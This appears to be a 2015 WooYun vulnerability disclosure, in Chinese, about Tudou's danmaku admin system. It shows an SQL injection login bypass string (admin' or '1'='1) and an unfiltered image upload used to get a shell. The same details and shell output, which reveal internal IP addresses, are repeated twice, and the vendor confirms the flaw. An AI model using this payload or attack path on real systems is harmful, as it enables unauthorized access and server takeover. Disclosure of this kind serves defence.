当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156206

漏洞标题:土豆某系统SQL注入到Getshell

相关厂商:土豆网

漏洞作者: 玉林嘎

提交时间:2015-11-27 09:47

修复时间:2016-01-11 19:20

公开时间:2016-01-11 19:20

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

rt

详细说明:

http://xianchang03.danmu.tudou.com/login.do
土豆弹幕系统 之前报过弱口令 其实登录有个注入
admin' or '1'='1 直接bypass登录

1.png


可以控制弹幕 不说
后台传图片 无任何过滤 可shell

2.png


/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0 Link encap:Ethernet HWaddr 00:18:51:1D:52:20
inet addr:10.108.19.65 Bcast:10.108.19.255 Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:252483004549751 (229.6 TiB) TX bytes:20605763332642 (18.7 TiB)
eth1 Link encap:Ethernet HWaddr 00:18:51:59:22:64
inet addr:101.227.9.28 Bcast:101.227.9.255 Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:27841613550 (25.9 GiB) TX bytes:8370498080 (7.7 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:32129258181 (29.9 GiB) TX bytes:32129258181 (29.9 GiB)


内网中

漏洞证明:

http://xianchang03.danmu.tudou.com/login.do
土豆弹幕系统 之前报过弱口令 其实登录有个注入
admin' or '1'='1 直接bypass登录

1.png


可以控制弹幕 不说
后台传图片 无任何过滤 可shell

2.png


/home/app_admin/apache-tomcat/webapps/dmfile/>id
uid=501(app_admin) gid=501(app_admin) groups=501(app_admin)
/home/app_admin/apache-tomcat/webapps/dmfile>ifconfig
eth0 Link encap:Ethernet HWaddr 00:18:51:1D:52:20
inet addr:10.108.19.65 Bcast:10.108.19.255 Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe1d:5220/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:221236474134 errors:0 dropped:0 overruns:0 frame:0
TX packets:221450227112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:252483004549751 (229.6 TiB) TX bytes:20605763332642 (18.7 TiB)
eth1 Link encap:Ethernet HWaddr 00:18:51:59:22:64
inet addr:101.227.9.28 Bcast:101.227.9.255 Mask:255.255.255.0
inet6 addr: fe80::218:51ff:fe59:2264/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:450103026 errors:0 dropped:0 overruns:0 frame:0
TX packets:13208323 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:27841613550 (25.9 GiB) TX bytes:8370498080 (7.7 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:158360007 errors:0 dropped:0 overruns:0 frame:0
TX packets:158360007 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:32129258181 (29.9 GiB) TX bytes:32129258181 (29.9 GiB)


内网中

修复方案:

修复

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-27 19:19

厂商回复:

确认漏洞,多谢玉林嘎。

最新状态:

暂无